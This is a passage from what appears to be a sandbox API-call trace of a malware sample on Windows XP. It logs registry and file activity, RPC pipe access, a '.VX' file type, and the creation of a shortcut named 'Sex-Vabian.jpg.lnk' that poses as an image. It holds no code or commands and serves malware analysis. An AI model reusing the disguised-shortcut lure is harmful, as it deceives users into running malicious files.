| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x000001fc FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Desktop |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Desktop Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\Desktop |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Common Desktop |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x0000020c Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Common Desktop Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x0000020c SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Desktop |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x00000200 SubKey => FileExts |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001fc SubKey => .VX |
FAILURE | 0x00000002 | 1 time |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 326 FunctionName => FunctionAddress => 0x773e0cc1 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020e Registry => 0x80000000 SubKey => .VX |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020e Data => V\x00X\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000212 Registry => 0x80000000 SubKey => VXFile |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000212 SubKey => CurVer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000216 Registry => 0x00000212 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000212 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000216 SubKey => ShellEx\IconHandler |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => SystemFileAssociations\.VX |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000212 Registry => 0x80000000 SubKey => .VX |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000212 DataLength => 80 ValueName => PerceivedType Type => 1299628 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000212 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => DocObject Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => BrowseInPlace Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000216 SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000212 Registry => 0x80000000 SubKey => * |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000212 SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => IsShortcut Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => AlwaysShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => NeverShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020e |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000216 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000212 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrLoadDll |
Flags => 1302512 BaseAddress => 0x76980000 FileName => LINKINFO.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CreateLinkInfoW FunctionAddress => 0x769818e6 ModuleHandle => 0x76980000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenFile |
ShareAccess => 3 FileName => C:\ DesiredAccess => 0x00100001 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x02\x00\x00\x00\\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\srvsvc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtSetInformationFile |
FileHandle => 0x0000020c FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,453 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xc8O2Kp\x16\xd3\x01\x12xZG\xbfn\xe1\x88\x03\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x9b&\x00\x00
\x00\PIPE\srvsvc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000002 SubKey => System\CurrentControlSet\Control\ProductOptions |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => W\x00i\x00n\x00N\x00T\x00\x00\x00 ValueName => ProductType |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000002 SubKey => System\CurrentControlSet\Services\LanmanServer\DefaultSecurity |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegQueryValueExW |
Handle => 0x0000020c DataLength => 0 ValueName => SrvsvcDefaultShareInfo Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtSetInformationFile |
FileHandle => 0x00000214 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,453 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xff$\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\srvsvc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtSetInformationFile |
FileHandle => 0x0000020c FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,453 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xc8O2Kp\x16\xd3\x01\x12xZG\xbfn\xe1\x88\x03\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x9c&\x00\x00
\x00\PIPE\srvsvc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x0000020c ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000214 ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryValueKey |
Information => M\x00I\x00K\x00E\x00-\x00B\x00D\x000\x001\x009\x006\x00D\x000\x003\x009\x00\x00\x00 KeyHandle => 0x00000214 ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DestroyLinkInfo FunctionAddress => 0x7698185f ModuleHandle => 0x76980000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 7 FileName => C:\WINDOWS\Vabian.VX DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => \x90\x9e\x04?\xac\x9f\xd3\x01\x90\x9e\x04?\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01 \x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xab9\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x80\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x01\x00\x00\x00$\x00\x00\x00\\x00W\x00 |
FAILURE | 0x80000005 | |
| 19:40:26,453 | 252 | DeviceIoControl |
DeviceHandle => 0x0000020c OutBuffer => \xc1Z\xab\xb2\x96\x0b\xe8\x11\x8c\x1b\x08\x00'\xc8RU\xb8\xf1\xf7v\xcfshN\x81\xce7;\xa3\xba\x01\x1b\xc1Z\xab\xb2\x96\x0b\xe8\x11\x8c\x1b\x08\x00'\xc8RU\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 IoControlCode => 590016 InBuffer => |
SUCCESS | 0x00000001 | |
| 19:40:26,453 | 252 | NtOpenFile |
ShareAccess => 3 FileName => C:\WINDOWS DesiredAccess => 0x00100080 FileHandle => 0x00000000 |
FAILURE | 0xc00000ba | |
| 19:40:26,453 | 252 | NtQueryInformationFile |
FileHandle => 0xffffffff FileInformation => \x03\x00\x00\x00\\xd6\x13\x00\xa7\x1b\x83|\x1c\xdb\x13\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x80\x00 \x02\xff\xff\xff\xff@\x00\x00\x00\xe3\xc2\xc2w\x00\xdb\x13\x00w\x1b\x83|\x1c\xdb\x13\x00\xec\xd6\x13\x00\x04\x01\x00\x00\x00\x00\x00\x00D\xdd\x13\x00\x0c\x02\x00\x00\x08\xb0\x17\x00,\x01\x00\x00\x99\xa4\x80|\x80/\x16\x00\x01\x00\x00\x0ex\xd7\x13\x00\x16\x00\x00\x00L\xd7\x13\x00\x18\xb8C\x00\x00\x00\x00\x00\x1c\xdb\x13\x00\x18\x00\x00\x00\x00\x00\x00\x00\xe0\xd6\x13\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\xfb\x7f\xf6\xacoex\xd7\x13\x00\x16\x00\x00\x00\x00\x00\x00\x00\x01\x00\x10\x00\xba\x00\x00\xc0\xa0 \x16\x00\x1c\x00\x1a\x02\xa0 \x16\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00\x00\xd7\x13\x00L\xd7\x13\x00\x16\x00\x00\x00\x05\x9e\x80|\x80/\x16\x00\x1c\x00\xfb\x7f\xf6\xacoe\xe0\xacoe\x16\x00\x00\x00T\x00_\x00D\x00I\x00G\x00I\x00\xfc\xd4\x00\x00 |
FAILURE | 0xc0000024 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\WINDOWS\ DesiredAccess => 0x00100080 CreateDisposition => 1 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | DeviceIoControl |
DeviceHandle => 0x00000214 OutBuffer => x\x01\x16\x00(\x14\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 IoControlCode => 589992 InBuffer => |
FAILURE | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenFile |
ShareAccess => 3 FileName => C:\WINDOWS DesiredAccess => 0x00100080 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000214 ObjectAttributes => \Registry\Machine\System\CurrentControlSet\Control\ComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenKey |
DesiredAccess => 131097 KeyHandle => 0x00000218 ObjectAttributes => ActiveComputerName |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryValueKey |
Information => M\x00I\x00K\x00E\x00-\x00B\x00D\x000\x001\x009\x006\x00D\x000\x003\x009\x00\x00\x00 KeyHandle => 0x00000218 ValueName => ComputerName Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\All Users\Desktop\Sex-Vabian.jpg.lnk DesiredAccess => 0xc0100080 CreateDisposition => 5 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SHChangeNotify FunctionAddress => 0x7ca24909 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x00000216 Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x0000021a Registry => 0x80000000 SubKey => Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9} |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegQueryValueExW |
Handle => 0x0000021a Data => 32 ValueName => DriveMask |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x0000021a |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegEnumKeyW |
Handle => 0x00000216 Name => {fbeb8a05-beee-4442-804e-409d6c4515e9} Index => 1 |
FAILURE | 0x00000103 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x00000216 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0007 SectionHandle => 0x00000214 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e09c SectionHandle => 0x00000214 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e0bc SectionHandle => 0x00000218 ProcessHandle => 0xffffffff BaseAddress => 0x00fa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Start Menu |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000218 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000218 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00S\x00t\x00a\x00r\x00t\x00 \x00M\x00e\x00n\x00u\x00\x00\x00 ValueName => Start Menu Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\Start Menu |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Start Menu\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21786
FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
